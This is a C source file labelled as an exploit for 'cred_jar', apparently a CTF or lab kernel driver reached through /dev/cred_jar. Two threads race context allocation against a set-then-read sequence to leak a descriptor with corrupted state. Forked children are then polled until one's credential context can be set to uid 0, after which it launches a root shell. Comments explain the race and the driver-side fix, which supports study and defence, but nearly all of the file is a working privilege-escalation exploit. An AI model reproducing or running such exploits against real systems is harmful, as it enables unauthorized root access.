exploit for cred_jar
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <pthread.h>
/*
 * ioctl request codes for the /dev/cred_jar device (magic 't').  What each
 * one expects as its argument is inferred from the calls in this file, not
 * from the driver: ALLOC_CTX is passed a packed unsigned long (see put()),
 * USE_CTX and SET_ID a plain int, GET_ID a pointer to an int that the
 * driver fills in -- confirm against the driver's ioctl handler.
 */
#define ALLOC_CTX _IO('t', 1)
#define USE_CTX _IO('t', 2)
#define GET_ID _IO('t', 3)
#define SET_ID _IO('t', 4)
/*
 * race_stop is set by get() to end both worker loops.  volatile only forces
 * the loads and stores to be emitted; it is not a synchronization primitive,
 * so an _Atomic int would be the correct type for a flag shared between
 * threads.  race_start is declared but never referenced in this file.
 */
volatile int race_stop, race_start;
/* The descriptor get() leaves open when it breaks out of its loop.  Written
 * by the get() thread, read by main() only after pthread_join(), so the join
 * provides the needed ordering. */
int bug_fd;
/*
 * Worker thread: repeatedly opens the device, binds the open file to context
 * id 2 with USE_CTX, sleeps briefly, then reads the id back with GET_ID.
 * The loop ends the first time the value read back is not the one that was
 * set -- presumably because the concurrent ALLOC_CTX calls in put() changed
 * the state behind this descriptor during the usleep() gap.  That
 * descriptor is deliberately left open and published in bug_fd for main().
 *
 * Seen from the driver, "id set on this fd, then read back different" means
 * the per-open state can be modified through another open of the same
 * device while a caller is still using it; the fix belongs in the driver
 * (reference-counted context objects, or a lock held across the whole
 * set-then-use sequence), not in user space.
 *
 * arg is unused (pthread_create signature).  Always returns NULL.
 */
void *get(void *arg)
{
    int fd, id;   /* id is only assigned inside the loop; see the note at printf() */
    while (!race_stop) {
        /* open() is not checked: on failure fd is -1, the ioctl below fails
         * and control falls through to close(-1), which merely returns EBADF. */
        fd = open("/dev/cred_jar", O_RDWR);
        if (ioctl(fd, USE_CTX, 2) < 0)
            goto fail;
        usleep(1);   /* gap between the set and the read-back; put() runs meanwhile */
        if (ioctl(fd, GET_ID, &id) < 0)
            goto fail;
        if (id != 2) {
            /* Mismatch observed: stop both threads and keep this fd open. */
            race_stop = 1;
            break;
        }
fail:
        close(fd);
    }
    /* If the loop body never ran (race_stop already set at entry) id would be
     * read uninitialized here.  Only this function sets the flag, so that
     * cannot happen today, but `int fd = -1, id = 0;` would make it obvious. */
    printf("id %x\n", id);
    bug_fd = fd;
    return NULL;
}
/*
 * Worker thread: in a tight loop, opens the device, issues ALLOC_CTX and
 * closes again, so that contexts are being allocated and released while
 * get() is between its USE_CTX and GET_ID calls.
 *
 * The ioctl argument packs two values into one unsigned long: 2 in the upper
 * 32 bits and 128 in the lower 32 -- presumably a context id and a size, but
 * that is the driver's contract; verify against its handler.  `2ul << 32` is
 * only well-defined where unsigned long is 64 bits wide; on an ILP32 target
 * the shift count equals the type width, which is undefined behavior.
 *
 * Neither open() nor ioctl() is checked: a failed open() yields fd == -1,
 * the ioctl then fails with EBADF and close(-1) is harmless.
 *
 * arg is unused (pthread_create signature).  Always returns NULL.
 */
void *put(void *arg)
{
    int fd;
    while (!race_stop) {
        fd = open("/dev/cred_jar", O_RDWR);
        ioctl(fd, ALLOC_CTX, 2ul << 32| 128);
        close(fd);
    }
    return NULL;
}
/*
 * Entry point.  Phase one runs get() and put() concurrently until get()
 * observes a mismatched id and sets race_stop; both threads are joined (the
 * pthread_create() return values are not checked).  Phase two polls the
 * descriptor get() left open (bug_fd): each iteration forks a child, reads
 * the id back with GET_ID and prints it; when the id equals the caller's own
 * uid it issues SET_ID 0 and stops.  The forked children sleep, and if they
 * find themselves running as uid 0 fork once more so that the grandchild can
 * run /bin/sh; otherwise they block in pause().
 *
 * argc and argv are unused.  Returns 0 only if pause() ever returns, which
 * requires a signal handler this file does not install.
 */
int main(int argc, char **argv)
{
    pthread_t t1, t2;
    int id = 0, pid;
    pthread_create(&t1, NULL, get, NULL);
    pthread_create(&t2, NULL, put, NULL);
    sleep(1);
    /* get() is the only writer of race_stop, so joining t1 first means put()
     * will also see the flag and t2 joins promptly afterwards. */
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    sleep(1);
    while (1) {
        /* Children are never reaped (<sys/wait.h> is included but wait() is
         * not called); every iteration leaves one child blocked in pause(). */
        pid = fork();
        if (pid == 0) {
            sleep(4);
            if (getuid() == 0) {
                if (fork() == 0) {
                    seteuid(0);
                    system("/bin/sh");
                } else {
                    exit(0);
                }
            }
            pause();
        }
        /* Return value unchecked: if GET_ID fails, id keeps its previous
         * value (0 from the initializer on the first pass). */
        ioctl(bug_fd, GET_ID, &id);
        printf("uid %x\n", id);
        /* int vs uid_t comparison: id is converted to unsigned here, so a
         * negative id can never match; the `id >= 0` branch below treats
         * negatives as something other than a uid -- presumably an error
         * value from the driver, confirm against its GET_ID handler. */
        if (id == getuid()) {
            ioctl(bug_fd, SET_ID, 0);
            break;
        }
        else if (id >= 0) {
            sleep(2);
        }
    }
    pause();
    return 0;
}